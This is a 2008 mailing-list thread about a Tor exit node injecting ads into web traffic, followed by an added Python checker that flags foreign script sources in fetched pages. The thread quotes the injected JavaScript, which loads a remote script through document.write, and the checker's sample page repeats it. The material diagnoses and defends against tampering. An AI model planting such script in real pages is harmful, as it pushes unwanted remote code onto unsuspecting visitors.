
Re: tortila as a bad exit



On Tue, Aug 12, 2008 at 11:29:56AM +0100, Robert Hogan wrote:
> On Tuesday 12 August 2008 10:09:13 Drake Wilson wrote:
> > Quoth Scott Bennett <bennett@xxxxxxxxxx>, on 2008-08-11 23:30:20 -0500:
> > >      I'm not convinced.  It hasn't taken any 300 circuits for me.  It
> > > seems to happen every time I have a circuit that exits via tortila.  It
> > > happens with every destination web page.
> >
> > I can confirm this.  I can't seem to find much pattern to it, though.
> >
> 
> I did a simple wget test (no privoxy) and found fairly consistent insertions of 
> adsense spam to stevepavlima.com regardless of the site I targeted (google.*, 
> guardian.co.uk, irishtimes.com, cnn.com).
> 
> <script type="text/javascript">var 
> externalscript="http://pagead2.googlesyndication.stevepavlima.com/show_ads.js";; 
> document.write('<script type="text/javascript" src="'+externalscript+'?'+new 
> Date() * 1+'"><\/script>');</script>
> 
> I found that using a regular browser the corruption appears infrequent (caching, 
> browsers doing their best to make sense of garbage), but the corruption is 
> consistent using wget. Where there was no insertion of stevepavlima.com (which 
> was rare) I just saw simple truncation.
> 
> Can anyone else confirm this?
> 

Yes, I can confirm this.  Sending single requests to random
addresses via this node is sufficient. I did this on two following
days; the first go was quite immediately after a post in or-talk
regarding this issue, so possibly there were others also trying to
check this node at that time. The second go though was about 24
hours later, so the first 'rush' of testing tortila might have been
over, but results are similar.  Very few of the results were
requested via 'host.node.exit'; most were done with a modified
torrc.  I chose sites that have content where I just about know what
to expect without double-checking.  These results were unforced,
meaning that only one request was sent at a time. But even the
honourable torproject.org site had a minor (bottom) change of
appearance.

There is a simple browser feature, which is to simultaneously open
all bookmarks in a bookmark folder. Doing this, it was possible to
get results of mixed pages: one time the source site from where content
was merged into others plus the modified ones.  Streams seem to have
mixed up somehow with other pages' content, or the page itself got
mixed up. On some altered pages 'noise' is to be found, which could
be interpreted as a dump of encrypted traffic added unmodified in
between valid html/php/ or whatever tags.  Others are simply
incomplete; maybe the missing parts have merged into other streams.
Some of them show php/perl/html tags printed.

I tried only one other node similar to 'tortila', which was 'nexus',
but could not at all reproduce the results from 'tortila' there.
Maybe I should continue with other methods.
As noted, this is done with very little effort, but I hope it can help.

As of today, 12th of August, and a few more tries, it appears as if
this behaviour can be witnessed without any real effort; any
connection from the Tor network through 'tortila' is in danger of
being modified.  There is no obvious pattern, changes are random and
make no sense, yet I do not really believe this to be a bug in Tor.

The same javascript tags reappear on a number of
altered pages, and the same mixed nonsense, again javascript
related, appears within pages if requests for the same page are made at
another time.  There also seem to be pages more resistant or even
more or less immune against this, as they do not use javascript.
My best guess is that some http proxy with filtering capabilities,
misconfigured to run with a Tor exit node, is the cause of this issue.

The worse guess is someone trying to make money with the Tor network
by adding paid ads to webpages in order to reach a rather huge
audience. If this is so, it is not very successful. But this
certainly is a 'bad exit' if the owner does not manage a proper
reconfiguration.

And yes, stevepavlima is very frequent on modified pages.


Regards

Hans
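A defender-side check for the kind of insertion Robert's wget test and Hans's observations describe, added here as an example and not code from the thread: it scans an already-fetched HTML body (fetched via the exit under test, in the way Robert did) for script sources outside the site's own domains, catching both plain `<script src=...>` tags and the `externalscript=...` / `document.write` form quoted above. The sample page, the regex and the helper names are my own constructions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline form reported in the thread: a URL assigned to a variable, then
# written into the page through document.write('<script src=...>').
EXTERNAL_SCRIPT_RE = re.compile(r'externalscript\s*=\s*["\']([^"\']+)["\']', re.I)

class _ScriptCollector(HTMLParser):
    """Collect <script src=...> URLs and the bodies of inline scripts."""
    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)

def find_foreign_scripts(html, allowed_hosts):
    """Return script hosts outside allowed_hosts (the site's own domains).
    Relative URLs are same-origin and skipped; hosts match by domain suffix."""
    collector = _ScriptCollector()
    collector.feed(html)
    candidates = collector.srcs + EXTERNAL_SCRIPT_RE.findall("".join(collector.inline))
    foreign = set()
    for url in candidates:
        host = urlparse(url).hostname
        if host and not any(host == a or host.endswith("." + a) for a in allowed_hosts):
            foreign.add(host)
    return sorted(foreign)

# Constructed sample: a page of example.org carrying the snippet quoted in the thread.
SAMPLE_PAGE = """<html><head><script src="https://www.example.org/app.js"></script>
</head><body><p>Hello</p>
<script type="text/javascript">var
externalscript="http://pagead2.googlesyndication.stevepavlima.com/show_ads.js";
document.write('<script type="text/javascript" src="'+externalscript+'?'+new
Date() * 1+'"><\\/script>');</script></body></html>"""
```

Running `find_foreign_scripts(SAMPLE_PAGE, ["example.org"])` over a body fetched through the suspect exit, and again over the same URL fetched directly, makes the injected host stand out while the site's own CDN hosts (listed in `allowed_hosts`) stay quiet.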